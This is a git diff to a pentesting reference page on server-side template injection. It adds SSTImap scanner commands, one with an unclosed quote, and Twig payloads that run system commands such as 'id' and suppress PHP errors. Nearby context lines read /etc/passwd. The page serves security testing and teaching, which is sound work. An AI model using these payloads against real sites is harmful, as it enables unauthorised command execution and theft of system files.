diff --git a/pentesting-web/ssti-server-side-template-injection/README.md b/pentesting-web/ssti-server-side-template-injection/README.md index dc87abfe4..ed9cf950b 100644 --- a/pentesting-web/ssti-server-side-template-injection/README.md +++ b/pentesting-web/ssti-server-side-template-injection/README.md @@ -125,6 +125,14 @@ tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..." tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..." ``` +### [SSTImap](https://github.com/vladko312/sstimap) + +```bash +python3 sstimap.py -i -l 5 +python3 sstimap.py -u "http://example.com/ --crawl 5 --forms +python3 sstimap.py -u 'https://example.com/page?name=John' -s +``` + ### [Tplmap](https://github.com/epinna/tplmap) ```python @@ -539,6 +547,10 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1 {{['id']|filter('system')}} {{['cat\x20/etc/passwd']|filter('system')}} {{['cat$IFS/etc/passwd']|filter('system')}} +{{['id',""]|sort('system')}} + +#Hide warnings and errors for automatic exploitation +{{["error_reporting", "0"]|sort("ini_set")}} ``` **Twig - Template format** @@ -1040,6 +1052,8 @@ If you think it could be useful, read: {% embed url="https://github.com/Hackmanit/TInjA" %} +{% embed url="https://github.com/vladko312/sstimap" %} + {% embed url="https://github.com/epinna/tplmap" %} {% embed url="https://github.com/Hackmanit/template-injection-table" %}